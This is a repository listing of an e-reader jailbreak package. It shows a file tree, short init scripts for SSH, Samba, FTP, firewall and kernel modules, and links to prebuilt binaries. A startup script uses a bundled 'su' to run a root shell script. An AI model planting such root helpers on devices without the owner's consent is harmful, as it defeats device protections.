├── svc
├── bin
│ ├── empty.sh
│ ├── nmbd
│ ├── scp
│ ├── smbpasswd
│ ├── ssh
│ ├── iptables-restore
│ ├── iptables-save
│ ├── htop
│ ├── lftp
│ ├── nano
│ ├── rsync
│ ├── smbd
│ ├── dropbear
│ ├── iptables
│ ├── lighttpd
│ ├── ntlmhash
│ ├── powertop
│ ├── proftpd
│ ├── sftp-server
│ ├── ins_usb_mod.sh
│ ├── usb_test.sh
│ ├── netagent
│ ├── applysettings.app
│ ├── rm_usb_mod.sh
│ └── sysstat.app
├── .ssh
├── etc
│ ├── terminfo
│ │ ├── r
│ │ │ ├── rxvt-m
│ │ │ ├── rxvt
│ │ │ ├── rxvt-basic
│ │ │ └── rxvt-unicode
│ │ ├── v
│ │ │ ├── vt52
│ │ │ ├── vt100
│ │ │ ├── vt102
│ │ │ └── vt220
│ │ └── x
│ │ │ ├── xterm
│ │ │ ├── xterm-color
│ │ │ ├── xterm-debian
│ │ │ ├── xterm-mono
│ │ │ ├── xterm-vt220
│ │ │ ├── xterm-256color
│ │ │ └── xterm-xfree86
│ ├── init.d
│ │ ├── 30-ftpd.sh
│ │ ├── 05-firewall.sh
│ │ ├── 00-mod.sh
│ │ ├── 20-smbd.sh
│ │ ├── 10-sshd.sh
│ │ ├── 00-cpufreq.sh
│ │ ├── 40-httpd.sh
│ │ ├── 01-tzfix.sh
│ │ ├── 00-net.sh
│ │ ├── 02-usb.sh
│ │ ├── 00-setpass.sh
│ │ └── 90-fix.sh
│ ├── mod
│ │ └── 3.10.65+
│ │ │ ├── 1
│ │ │ ├── f2fs.ko.gz
│ │ │ ├── fuse.ko.gz
│ │ │ ├── md4.ko.gz
│ │ │ ├── mii.ko.gz
│ │ │ ├── ntfs.ko.gz
│ │ │ ├── tun.ko.gz
│ │ │ ├── cdc-wdm.ko.gz
│ │ │ ├── fscache.ko.gz
│ │ │ ├── isofs.ko.gz
│ │ │ ├── romfs.ko.gz
│ │ │ ├── sunrpc.ko.gz
│ │ │ ├── mac-greek.ko.gz
│ │ │ ├── mac-inuit.ko.gz
│ │ │ ├── mac-roman.ko.gz
│ │ │ ├── nls_ascii.ko.gz
│ │ │ ├── nls_cp737.ko.gz
│ │ │ ├── nls_cp775.ko.gz
│ │ │ ├── nls_cp850.ko.gz
│ │ │ ├── nls_cp852.ko.gz
│ │ │ ├── nls_cp855.ko.gz
│ │ │ ├── nls_cp857.ko.gz
│ │ │ ├── nls_cp860.ko.gz
│ │ │ ├── nls_cp861.ko.gz
│ │ │ ├── nls_cp862.ko.gz
│ │ │ ├── nls_cp863.ko.gz
│ │ │ ├── nls_cp864.ko.gz
│ │ │ ├── nls_cp865.ko.gz
│ │ │ ├── nls_cp866.ko.gz
│ │ │ ├── nls_cp869.ko.gz
│ │ │ ├── nls_cp874.ko.gz
│ │ │ ├── nls_cp932.ko.gz
│ │ │ ├── nls_cp936.ko.gz
│ │ │ ├── nls_cp949.ko.gz
│ │ │ ├── nls_cp950.ko.gz
│ │ │ ├── squashfs.ko.gz
│ │ │ ├── ansi_cprng.ko.gz
│ │ │ ├── mac-celtic.ko.gz
│ │ │ ├── mac-centeuro.ko.gz
│ │ │ ├── mac-croatian.ko.gz
│ │ │ ├── mac-cyrillic.ko.gz
│ │ │ ├── mac-gaelic.ko.gz
│ │ │ ├── mac-iceland.ko.gz
│ │ │ ├── mac-romanian.ko.gz
│ │ │ ├── mac-turkish.ko.gz
│ │ │ ├── nls_cp1250.ko.gz
│ │ │ ├── nls_cp1251.ko.gz
│ │ │ ├── nls_cp1255.ko.gz
│ │ │ ├── nls_euc-jp.ko.gz
│ │ │ ├── nls_koi8-r.ko.gz
│ │ │ ├── nls_koi8-ru.ko.gz
│ │ │ ├── nls_koi8-u.ko.gz
│ │ │ ├── nls_iso8859-13.ko.gz
│ │ │ ├── nls_iso8859-14.ko.gz
│ │ │ ├── nls_iso8859-15.ko.gz
│ │ │ ├── nls_iso8859-2.ko.gz
│ │ │ ├── nls_iso8859-3.ko.gz
│ │ │ ├── nls_iso8859-4.ko.gz
│ │ │ ├── nls_iso8859-5.ko.gz
│ │ │ ├── nls_iso8859-6.ko.gz
│ │ │ ├── nls_iso8859-7.ko.gz
│ │ │ ├── nls_iso8859-9.ko.gz
│ │ │ └── ion-kernel-use-demo.ko.gz
│ │ │ ├── 2
│ │ │ ├── cifs.ko.gz
│ │ │ ├── cuse.ko.gz
│ │ │ ├── lockd.ko.gz
│ │ │ ├── nfs_acl.ko.gz
│ │ │ ├── usbnet.ko.gz
│ │ │ └── cachefiles.ko.gz
│ │ │ ├── 3
│ │ │ ├── nfs.ko.gz
│ │ │ ├── cdc_eem.ko.gz
│ │ │ ├── cdc_ncm.ko.gz
│ │ │ ├── cdc_ether.ko.gz
│ │ │ └── cdc_subset.ko.gz
│ │ │ └── 4
│ │ │ ├── nfsv2.ko.gz
│ │ │ ├── nfsv3.ko.gz
│ │ │ ├── cdc_mbim.ko.gz
│ │ │ └── rndis_host.ko.gz
│ ├── firewall
│ ├── proftpd.conf
│ ├── motd
│ ├── rcS
│ ├── lighttpd.conf
│ └── samba
│ │ └── smb.conf
├── .config
│ └── htop
│ │ └── htoprc
├── .profile
└── runonce
│ └── jailbreak_startup.sh
├── su
├── jailbreak
├── rundocker.sh
├── .gitmodules
├── su.c
├── samba-patches
├── 300-assert_debug_level.patch
├── 100-configure_fixes.patch
├── 320-debug_level_checks.patch
├── 029-CVE-2017-7494-v3-6.patch
├── 030-CVE-2017-15275-v3.6.patch
├── 120-add_missing_ifdef.patch
├── 010-patch-cve-2015-5252.patch
├── 270-remove_registry_backend.patch
├── 032-CVE-2018-1050-v3-6.patch
├── 240-remove_dfs_api.patch
├── 290-remove_lsa.patch
├── 028-CVE-2016-2125-v3.6.patch
├── 210-remove_ad_support.patch
├── 032-CVE-2017-12150-v3.6.patch
├── 220-remove_services.patch
├── 012-patch-cve-2015-5299.patch
├── 011-patch-cve-2015-5296.patch
├── 280-strip_srvsvc.patch
├── 230-remove_winreg_support.patch
├── 110-multicall.patch
├── 260-remove_samr.patch
├── 031-CVE-2017-12163-v3.6.patch
├── 025-CVE-2016-2112-v3-6.patch
├── 015-patch-cve-2015-7560.patch
├── 250-remove_domain_logon.patch
├── 111-owrt_smbpasswd.patch
├── 023-CVE-2016-2110-v3-6.patch
├── 200-remove_printer_support.patch
├── 026-CVE-2016-2115-v3-6.patch
├── 310-remove_error_strings.patch
└── 027-CVE-2016-2118-v3-6.patch
├── plugin-static.h
├── jailbreak-installer.sh
├── Dockerfile
├── README.md
├── jailbreak.c
├── ntlmhash.c
├── services-installer.sh
└── Makefile
/svc/bin/empty.sh:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/svc/bin/nmbd:
--------------------------------------------------------------------------------
1 | smbd
--------------------------------------------------------------------------------
/svc/.ssh:
--------------------------------------------------------------------------------
1 | /mnt/ext1/.ssh
--------------------------------------------------------------------------------
/svc/bin/scp:
--------------------------------------------------------------------------------
1 | dropbear
--------------------------------------------------------------------------------
/svc/bin/smbpasswd:
--------------------------------------------------------------------------------
1 | smbd
--------------------------------------------------------------------------------
/svc/bin/ssh:
--------------------------------------------------------------------------------
1 | dropbear
--------------------------------------------------------------------------------
/svc/bin/iptables-restore:
--------------------------------------------------------------------------------
1 | iptables
--------------------------------------------------------------------------------
/svc/bin/iptables-save:
--------------------------------------------------------------------------------
1 | iptables
--------------------------------------------------------------------------------
/svc/etc/terminfo/r/rxvt-m:
--------------------------------------------------------------------------------
1 | rxvt-basic
--------------------------------------------------------------------------------
/svc/.config/htop/htoprc:
--------------------------------------------------------------------------------
1 | tree_view=1
2 |
--------------------------------------------------------------------------------
/su:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/su
--------------------------------------------------------------------------------
/svc/.profile:
--------------------------------------------------------------------------------
1 | PATH=/mnt/secure/bin:$PATH:/sbin:/usr/sbin
2 |
--------------------------------------------------------------------------------
/jailbreak:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/jailbreak
--------------------------------------------------------------------------------
/svc/etc/init.d/30-ftpd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ##FTP server
3 | proftpd
4 |
--------------------------------------------------------------------------------
/svc/bin/htop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/htop
--------------------------------------------------------------------------------
/svc/bin/lftp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/lftp
--------------------------------------------------------------------------------
/svc/bin/nano:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/nano
--------------------------------------------------------------------------------
/svc/bin/rsync:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/rsync
--------------------------------------------------------------------------------
/svc/bin/smbd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/smbd
--------------------------------------------------------------------------------
/svc/bin/dropbear:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/dropbear
--------------------------------------------------------------------------------
/svc/bin/iptables:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/iptables
--------------------------------------------------------------------------------
/svc/bin/lighttpd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/lighttpd
--------------------------------------------------------------------------------
/svc/bin/ntlmhash:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/ntlmhash
--------------------------------------------------------------------------------
/svc/bin/powertop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/powertop
--------------------------------------------------------------------------------
/svc/bin/proftpd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/proftpd
--------------------------------------------------------------------------------
/rundocker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | docker run --rm -it --volume=$(pwd):/pbjb pbjb "$@"
--------------------------------------------------------------------------------
/svc/bin/sftp-server:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/bin/sftp-server
--------------------------------------------------------------------------------
/svc/etc/terminfo/r/rxvt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/r/rxvt
--------------------------------------------------------------------------------
/svc/etc/terminfo/v/vt52:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/v/vt52
--------------------------------------------------------------------------------
/svc/etc/terminfo/v/vt100:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/v/vt100
--------------------------------------------------------------------------------
/svc/etc/terminfo/v/vt102:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/v/vt102
--------------------------------------------------------------------------------
/svc/etc/terminfo/v/vt220:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/v/vt220
--------------------------------------------------------------------------------
/svc/etc/terminfo/x/xterm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/x/xterm
--------------------------------------------------------------------------------
/svc/runonce/jailbreak_startup.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | (/mnt/secure/su /bin/sh /mnt/secure/etc/rcS) &
3 |
--------------------------------------------------------------------------------
/svc/etc/terminfo/r/rxvt-basic:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/r/rxvt-basic
--------------------------------------------------------------------------------
/svc/etc/terminfo/r/rxvt-unicode:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/r/rxvt-unicode
--------------------------------------------------------------------------------
/svc/etc/terminfo/x/xterm-color:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/x/xterm-color
--------------------------------------------------------------------------------
/svc/etc/terminfo/x/xterm-debian:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/x/xterm-debian
--------------------------------------------------------------------------------
/svc/etc/terminfo/x/xterm-mono:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/x/xterm-mono
--------------------------------------------------------------------------------
/svc/etc/terminfo/x/xterm-vt220:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/x/xterm-vt220
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/f2fs.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/f2fs.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/fuse.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/fuse.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/md4.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/md4.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mii.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mii.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/ntfs.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/ntfs.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/tun.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/tun.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/2/cifs.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/2/cifs.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/2/cuse.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/2/cuse.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/3/nfs.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/3/nfs.ko.gz
--------------------------------------------------------------------------------
/svc/etc/terminfo/x/xterm-256color:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/x/xterm-256color
--------------------------------------------------------------------------------
/svc/etc/terminfo/x/xterm-xfree86:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/terminfo/x/xterm-xfree86
--------------------------------------------------------------------------------
/svc/etc/init.d/05-firewall.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | ##Firewall rules
3 | iptables-restore < /mnt/secure/etc/firewall
4 |
5 |
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/cdc-wdm.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/cdc-wdm.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/fscache.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/fscache.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/isofs.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/isofs.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/romfs.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/romfs.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/sunrpc.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/sunrpc.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/2/lockd.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/2/lockd.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/2/nfs_acl.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/2/nfs_acl.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/2/usbnet.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/2/usbnet.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/3/cdc_eem.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/3/cdc_eem.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/3/cdc_ncm.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/3/cdc_ncm.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/4/nfsv2.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/4/nfsv2.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/4/nfsv3.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/4/nfsv3.ko.gz
--------------------------------------------------------------------------------
/svc/etc/init.d/00-mod.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | for n in /mnt/secure/etc/mod/`uname -r`/*/*.ko.gz; do
3 | insmod $n
4 | done
5 |
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-greek.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-greek.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-inuit.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-inuit.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-roman.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-roman.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_ascii.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_ascii.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp737.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp737.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp775.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp775.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp850.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp850.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp852.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp852.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp855.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp855.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp857.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp857.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp860.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp860.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp861.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp861.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp862.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp862.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp863.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp863.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp864.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp864.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp865.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp865.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp866.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp866.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp869.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp869.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp874.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp874.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp932.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp932.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp936.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp936.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp949.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp949.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp950.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp950.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/squashfs.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/squashfs.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/3/cdc_ether.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/3/cdc_ether.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/4/cdc_mbim.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/4/cdc_mbim.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/ansi_cprng.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/ansi_cprng.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-celtic.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-celtic.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-centeuro.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-centeuro.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-croatian.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-croatian.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-cyrillic.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-cyrillic.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-gaelic.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-gaelic.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-iceland.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-iceland.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-romanian.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-romanian.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/mac-turkish.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/mac-turkish.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp1250.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp1250.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp1251.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp1251.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_cp1255.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_cp1255.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_euc-jp.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_euc-jp.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_koi8-r.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_koi8-r.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_koi8-ru.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_koi8-ru.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/1/nls_koi8-u.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/1/nls_koi8-u.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/2/cachefiles.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/2/cachefiles.ko.gz
--------------------------------------------------------------------------------
/svc/etc/mod/3.10.65+/3/cdc_subset.ko.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ezdiy/pbjb/HEAD/svc/etc/mod/3.10.65+/3/cdc_subset.ko.gz
